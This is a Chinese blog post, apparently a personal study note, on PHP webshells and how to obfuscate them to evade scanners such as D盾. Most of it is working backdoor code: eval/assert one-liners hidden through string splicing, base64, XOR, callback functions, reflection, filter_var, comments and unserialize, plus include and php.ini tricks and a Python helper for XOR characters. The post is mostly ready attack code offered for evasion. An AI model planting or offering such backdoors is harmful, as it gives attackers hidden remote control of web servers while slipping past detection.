美文网首页
初识webshell及免杀基础

初识webshell及免杀基础

作者: book4yi | 来源:发表于2020-07-02 21:41 被阅读0次

初识Webshell:

上传Webshell的目的:

1.权限维持,方便下次连接控制系统
2.权限提升,利用某些漏洞将权限提升至管理员权限
3.做跳板机--探测,攻击内网其他服务器
4.备份下载数据库文件或者其他重要文件
5.DDoS攻击--黑灰产DDoS攻击需求高
6.挖矿--例如利用JS挖掘门罗币
7.黑帽SEO ,流量劫持;提升在搜索引擎的排名
8.网页挂马--攻击访问者
9.充当代理服务器

上传WebShell的利用途径:

  1. 登陆管理后台
  2. 文件上传
  3. 代码执行&命令执行
  4. Web服务器文件解析漏洞
  5. SQL注入
  6. 文件包含
  7. 未授权访问
  8. 弱口令&暴力破解

WebShell变形技术——绕过检测:

  1. 关键字混淆
  2. 外调恶意代码
  3. 配置文件隐藏
  4. 文件包含
  5. 正则函数
  6. 回调函数
  7. 注释类后们
  8. 反射函数
  9. 过滤器函数后门
  10. 反序列化

最简单明了的webshell:

# shell.php
<?php @eval($_POST['cmd']);?>
关键字混淆——拼接:

拼接:将一些关键函数拆分,然后拼接,使得WebShlel检测系统无法匹配到关键字

# shell2.php
<?php
$a='a';
$b='ert';
$c=$a.'ss'.$b;  //assert
$c($_GET['cmd']);
?>
# shell3.php
<?php
@$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';
@$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';
@$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}
[/*-/*-*/123/*-/*-*/]);
?>
# shell4.php
<?php
$a='chr';
$b=$a(97).$a(115).$a(115).$a(101).$a(114).$a(116);  //assert
$b($_POST['test']);
?>
关键字混淆——加解密:

加解密:将关键代码加密后解密,能逃避一些没解密还原或还原程度不够的WebShell检测系统

# shell5.php
<?php
$a=base64_decode('YXNzZXJ0');//assert
$b=base64_decode('X0dFVA==');//_GET
$a(${$b}['test']);
?>
关键字混淆——异或类生成新字符:

异或类生成新字符:生成新字符,逃避检测系统对关键字的检测

# shell6.php
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"<0x06>").($_[+""]|"D").($_[+""]^"<0x15>"); //GET
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
# shell7.php
<?php
@$_++;  // $_ = 1
$__=("#"^"|");  // $__ = POST
$__.=("."^"~");
$__.=("/"^"`");
$__.=("|"^"/");
$__.=("{"^"/");
@eval(${$__}[!$_]); //PASS:0
?>

php我没系统学过,这里没看懂,以后有机会学php的话再来解释,先记录下来。
2021/3/18-补充:

#!/usr/bin/python
# -*- coding: utf-8 -*-
a= '#./|{'
b= '|~`//'
result_list = []
count = 0
if len(a)>len(b):
    for line in b:
        c=ord(a[count])
        d=ord(line)
        result = chr(c^d)
        print(result)
        result_list.append(result)
        count += 1
else:
    for line in a:
        c=ord(b[count])
        d=ord(line)
        result = chr(c^d)
        print(result)
        result_list.append(result)
        count += 1
decode_result = ''
for key in result_list:
    decode_result += key
print(decode_result)
#!/usr/bin/python
# -*- coding: utf-8 -*-

a= '`~·!@#$%^&*()_+{}[];\':|\"\\,./<>?/*-123456789asdfghjklqwertyuiopzxcvbnmASDFGHJKLQWERTYUIOPZXCVBNM'
b= '`~·!@#$%^&*()_+{}[];\':|\"\\,./<>?/*-123456789asdfghjklqwertyuiopzxcvbnmASDFGHJKLQWERTYUIOPZXCVBNM'
result_list = []
count = 0
for a_line in a:
    for b_line in b:
        if chr(ord(a_line)^ord(b_line))=='e':
            print("e: " + a_line + '\t' + b_line)
        elif chr(ord(a_line)^ord(b_line))=='v':
            print("v: " + a_line + '\t' + b_line)
        elif chr(ord(a_line)^ord(b_line))=='a':
            print("a: " + a_line + '\t' + b_line)
        elif chr(ord(a_line)^ord(b_line))=='l':
            print("l: " + a_line + '\t' + b_line)

D盾查杀测试:

2.外调恶意代码:

将真正的恶意代码隐藏在本地的一些图片,附件类文件里,或者使用远程下载的方式来逃避WebShell检测系统的识别
涉及的一些函数:file_get_contents,curl,include,require,file等

# test.php
<?php
$a = $_GET['file'];
@include($a);
?>

上传图片马(做好隐藏),然后通过include包含解析

如果想将恶意代码隐藏在其他服务器,我们使用HTTP,FTP去下载,不过前提是在php的配置文件php.ini中满足以下:

allow_url_fopen = On
allow_url_include = On

3.配置文件隐藏:

我们可以隐藏的配置文件如php.ini, .user.ini,.htaccess,下面以php.ini为例,在其配置文件中:

auto_prepend_file=“/file.php/” 相当于在php脚本头部include
auto_append_file=“/file.php/” 相当于在php脚本底部include

注:auto_prepend_file 与 auto_append_file 只能require一个php文件,但这个php文件内可以require多个其他的php文件。

4.文件包含:

通过包含文件来执行后门,这里介绍通过php流来达到后门文件的效果。
文件包含函数:Include,include_once,requiue ,require_once

这里利用之前提到的一个后门文件:

# test2.php
<?php @include($_GET['file']);?>

这里复现失败了,应该是环境原因,先放着。

正则函数:

使用正则函数preg_replace当作后门,能有效的混淆Web管理员和一些检测系统的查杀

# test3.php
<?php
$a=preg_replace("/d/","ss","adert");
$b=$_GET['cmd'];
$a($b)
?>

回调函数:

回调函数类后门是一个比较隐藏的后门类型,正是由于其不多见,一些WebShell的检测系统不会很严格的去检测这些函数。

可以做回调后门的一些函数:
call_user_func,call_user_func_array,array_filter,array_map,array_reduce,array_udiff,array_walk,array_walk_recursive

# test4.php
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));
?>

原理:array_filter() 函数把输入数组中的每个键值传给回调函数。如果回调函数返回 true,则把输入数组中的当前键值返回给结果数组
"YXNzZXJ0"经过base64解码后为"assert",回调函数为assert,参数pass传输的数据会直接传给assert函数执行。

详情请参考:php回调后门,php过WAF一句话,php最新一句话,php过狗一句话

注释类后门:

一些WebShell的检测可能会忽略注释,而我们正好可以利用这一点

# test5.php
<?php
/**
* eval($_GET[m]);
*/

class Test { }
$rc = new ReflectionClass('Test'); //建立反射类的一个对象
$comment = $rc->getDocComment(); //执行反射类的一个成员函数,获取完整的注释。

$pos1 = strpos($comment,'eval'); //标记eval开始的位置
$pos2 = strpos($comment,';'); //标记结束的位置
$len = $pos2 - $pos1 + 1; //获取语句长度
$cmd = substr($comment,$pos1,$len); //按长度截取字符串

eval($cmd);
?>

有点问题

反射函数:

通过反射函数构造WebShell

# test6.php
<?php
$func = new ReflectionFunction("system");
echo $func->invokeArgs(array("$_GET[c]"));
?>

过滤器后门:

FILTER_CALLBACK 过滤器隐藏我们的后门文件

# test7.php
<?php
filter_var($_REQUEST['op'],FILTER_CALLBACK,array('options' => 'assert'));
?>

反序列化后门:

通过php的序列化和反序列化,我们也能制作一个WebShell后门

# test8.php
<?php
class A{
    var $test = 'demo';
    function __destruct(){
        @eval($this->test);
    }
}
$test = $_POST['test'];
$len = strlen($test)+1;
$pp = "0:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}";
$test_unser = unserialize($pp);

有点问题

D盾查杀检测:

总结一下,不懂php感觉没啥收获,有点后悔记录这篇文章了。。。

相关文章

  • 初识webshell及免杀基础

    初识Webshell: 上传Webshell的目的: 1.权限维持,方便下次连接控制系统2.权限提升,利用某些漏洞...

  • Webshell免杀

    前言 最近在研究php免杀绕过安全狗、D盾等WAF防护软件。也算是小有成绩。故记录下来。 一句话木马 在渗透测试中...

  • webshelle免杀套路

    转载自:https://nosec.org/home/detail/2574.html webshell免杀套路 ...

  • 无限免杀D盾脚本之aspx ——yzddMr6

    前言 自己曾经写过一篇文章:利用随机异或无限免杀某盾 php的webshell免杀方法有很多,但是市面上很少有讲a...

  • webshell以及免杀方式

    Webshell简介 Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,...

  • webshell多种方法免杀

    转载自公众号:开源聚合网络空间安全研究院 webshell这个东西对于web方向的还是极其重要的,getshell...

  • Jsp Webshell 免杀-命令执行

    前言 php的一句话木马即可以直接命令执行又可以作为冰蝎、蚁剑的客户端,而java就显得比较复杂。在经过java基...

  • 杀毒与免杀技术详解之三:特征码免杀实战

    杀毒与免杀技术详解之三:特征码免杀实战杀毒与免杀技术详解之二:特征码定位-工具及原理

  • 免杀基础

    (本文源于转载或摘抄整理):首先是免杀的概念一、什么是免杀 免杀,也就是反病毒(AntiVirus)与反间 谍(A...

  • [PHP] Webshell简单的免杀思路

    接到一个简单的需求, 客户自己的扫描工具把我们的代码,误认为是webshell。经过简单排查, 确认了误报 原因,...

网友评论

      本文标题:初识webshell及免杀基础

      本文链接:https://www.haomeiwen.com/subject/ughdqktx.html